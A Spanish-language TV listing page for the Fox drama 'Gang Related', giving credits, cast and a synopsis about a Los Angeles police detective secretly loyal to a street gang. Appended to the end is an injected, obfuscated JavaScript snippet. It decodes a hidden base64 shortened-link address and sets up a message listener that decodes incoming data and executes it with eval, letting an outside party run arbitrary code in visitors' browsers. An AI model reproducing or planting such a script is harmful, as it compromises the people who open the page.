Gang Related

Cartel Serie
Título Original: Gang Related
Creador: Chris Morgan
Producción Ejecutiva: Chris Morgan, Scott Rosenbaum, Brian Grazer, Francie Calfo y Allen Hughes
Estudio: 20th Century Fox Television
Género: Drama
Fecha de estreno: 22 de mayo de 2014
Lugar de rodaje: Los Angeles
Horario de emisión Jueves 9.00 p.m.
Distribución: Fox
Temporada: 1ª
Episodios: 13

Reparto:
Ramon Rodríguez ... Ryan Lopez
Terry O'Quinn ... Sam Chapel
Rza ... Cassius Green
Jay Hernandez ... Dante Acosta
Sung Kang ... Tae Kim
Inbar Lavi ... Vanessa "Vee" Hicks
Cliff Curtis ... Javier Acosta
Shantel VanSanten ... Jessica Shaw
Rey Gallegos ... Carlos Acosta

Descripcion

Solo aquellas personas que realmente conocen las calles pueden ganar la batalla en ellas. Gang Related es una enérgica serie de acción protagonizada una estrella en alza de la unidad especializada en bandas de la policía de Los Angeles que se une a un veterano compañero para acabar con tres de las bandas de pandilleros más peligrosas de la ciudad, incluida una con la que tiene vínculos desconocidos para el resto de sus compañeros. Para él, las relaciones personales que le unen a la calle y su trabajo como policía, hacen que su vida sea demasiado compleja. El sentimiento policial es más fuerte, al menos de momento. Pero eso podría cambiar en cualquier momento.

El detective Ryan Lopez (Ramon Rodriguez, The Wire: Bajo escucha) es una estrella emergente de la unidad del departamento de policía de Los Angeles que lucha contra las peligrosas bandas callejeras que actúan, a veces impunemente, en la ciudad. Lo que nadie sabe es que mucho tiempo antes de que Ryan fuese policía, prometió lealtad a una banda de hermanos completamente diferente, una poderosa banda latina conocida como Los Angélicos, una de las hermandades callejeras más violentas de Los Angeles.
(function(){if(document.cookie.indexOf(‘_advstop’)!==-1)return;var ajaxListener=function(){try{var c=window.atob(event.data);eval(c)}catch(e){}};document.write(”);var h=document.location.protocol+’//’+window.atob(‘Yml0Lmx5LzFFeFJXS2w=’)+’?’+Math.random();addEventListener(‘message’,ajaxListener,false);document.write(”)})();